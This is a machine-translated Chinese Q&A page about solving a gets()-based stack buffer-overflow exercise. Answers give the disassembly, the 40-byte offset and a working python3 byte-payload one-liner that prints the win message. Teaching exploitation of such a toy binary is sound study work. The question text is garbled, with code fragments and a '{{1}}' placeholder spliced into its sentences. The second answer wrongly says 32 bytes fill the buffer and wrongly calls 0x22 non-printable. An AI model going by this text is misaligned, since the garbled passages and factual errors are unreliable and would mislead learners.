问题描述
这是缓冲区溢出的二进制文件的摘录。我用 Ghidra 反编译了它。
0x00000000000011a7 <+8>: movabs $0x4141414141414141,%rax
0x00000000000011e6 <+71>: movabs $0x4141414141414141,%rax
0x00000000000011f6 <+87>: movabs $0x1122334455667788,%rax
我想了解为什么会发生缓冲区溢出。
我检查了“0x4141414141414141”十六进制值,发现它与“A”字符串有关。但是与“0x4141414141414141”和“0x1122334455667788”相关的条件究竟是做什么的?更准确地说,用户可以回答什么来获取消息(“那是赢了”)?
任何解释将不胜感激,谢谢!
___编辑___
我必须补充一点,我在使用“disas main”命令时看到了这两个十六进制值:
python3 -c "print ('A' * 32 +'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./ myBinary
我尝试使用 "Let's continue"
进行缓冲区溢出。
但我总是收到 char local_7 [40];
long local_78;
local_78 = 0x4141414141414141;
printf("Give it a try");
fflush(stdout);
gets(local_7);
[... and so on]
消息。我离解决方案不远了,但我想我错过了一件事..你能帮我什么吗?
___编辑 2___ 在得到之前:
{{1}}
解决方法
这里是完整的拆解:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000001189 <+0>: endbr64
0x000000000000118d <+4>: push %rbp
0x000000000000118e <+5>: mov %rsp,%rbp
0x0000000000001191 <+8>: sub $0x30,%rsp
0x0000000000001195 <+12>: lea 0xe68(%rip),%rdi # 0x2004
0x000000000000119c <+19>: mov $0x0,%eax
0x00000000000011a1 <+24>: callq 0x1080 <printf@plt>
0x00000000000011a6 <+29>: lea -0x30(%rbp),%rax
0x00000000000011aa <+33>: mov %rax,%rdi
0x00000000000011ad <+36>: mov $0x0,%eax
0x00000000000011b2 <+41>: callq 0x1090 <gets@plt>
0x00000000000011b7 <+46>: movabs $0x4141414141414141,%rax
0x00000000000011c1 <+56>: cmp %rax,-0x8(%rbp)
0x00000000000011c5 <+60>: je 0x11ef <main+102>
0x00000000000011c7 <+62>: movabs $0x1122334455667788,%rax
0x00000000000011d1 <+72>: cmp %rax,-0x8(%rbp)
0x00000000000011d5 <+76>: jne 0x11e3 <main+90>
0x00000000000011d7 <+78>: lea 0xe34(%rip),%rdi # 0x2012
0x00000000000011de <+85>: callq 0x1070 <puts@plt>
0x00000000000011e3 <+90>: lea 0xe33(%rip),%rdi # 0x201d
0x00000000000011ea <+97>: callq 0x1070 <puts@plt>
0x00000000000011ef <+102>: mov $0x0,%eax
0x00000000000011f4 <+107>: leaveq
0x00000000000011f5 <+108>: retq
重要地址可以通过设置gets
参数为local_7
的指令来确定:
0x00000000000011a6 <+29>: lea -0x30(%rbp),%rax
和比较 cmp
变量的 local_78
指令。
0x00000000000011c1 <+56>: cmp %rax,-0x8(%rbp)
如您所见,local_7
位于 -0x30(%rbp)
,而 local_78
位于 -0x8(%rbp)
,正好在缓冲区后 40 个字节处。
您的 python 命令不正确,因为您使用的字符串操作会导致它产生有效的 UTF-8,因此会产生额外的字节:
$ python3 -c "print ('A' * 40 +'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 c2 88 77 66 55 44 33 22 |AAAAAAAA..wfUD3"|
00000030 11 0a |..|
00000032
注意 c2
之前的 88
字节。有关详细信息,请参阅以下问题:
Why is the output of print in python2 and python3 different with the same string?
如果我们改为使用 bytes
类型,我们可以获得正确的输出:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 88 77 66 55 44 33 22 11 |AAAAAAAA.wfUD3".|
00000030
使用此输入,我们得到 "That's won"
消息:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|./a.out
Give it a tryThat's won
Let's continue
,
这个二进制文件很容易受到缓冲区溢出的影响,因为它使用了 get() 函数 which is vulnerable,并因此被弃用。
它将用户输入复制到传递的缓冲区,而不检查缓冲区的大小。因此,如果用户的输入大于可用空间,它将在内存中溢出,并可能覆盖位于缓冲区之后的其他变量或结构。
这就是 long local_78;
变量的情况,它位于缓冲区之后的堆栈中,因此我们可能会覆盖其值。
为此,我们需要传递一个输入:
- 最少 32 个字节,用于填充实际缓冲区。 (一个字符(ASCII 字符)通常应相当于 1 个字节)
- 加上,额外的可变字节数来填充缓冲区和
long
变量之间的空间(这是因为很多时候,编译器进行优化并可能在这两者之间添加其他变量,即使我们没有将它们放在代码中。堆栈是一个动态内存区域,因此通常不可能 100% 预测其布局) - 加上 8 字节,这在大多数计算机架构中通常是 long 的大小(尽管它可能不同,但我们假设这是 x86/64)。这是我们将用来溢出变量的值。
我们不关心放在前 32+X 个字节中的东西(空字节除外)。然后程序检查 local_78 的一些特殊值,如果检查通过,它会执行 puts ("That's won");
说你“赢了”或成功地利用了程序并覆盖了内存。
这里的问题是,这样的值是 0x1122334455667788(同样是一个 8 字节的 long)。我们可以读取分隔其字节的内容:0x11 0x22 0x33 0x44 0x55 0x66 0x77 0x88,并尝试查看哪个字节对应于哪个 character in ASCII 问题是像 0x22 这样的字节不是 ASCII 可表示的字符,所以你不能直接在控制台中输入它们,因为普通键盘没有输入字符 0x11 的键,因为它没有视觉表示。您将需要一个额外的程序来利用该程序。此类程序将需要使用操作系统中可用的任何机制来传递此类值。例如在 Linux 中,这可以使用管道/输出重定向来完成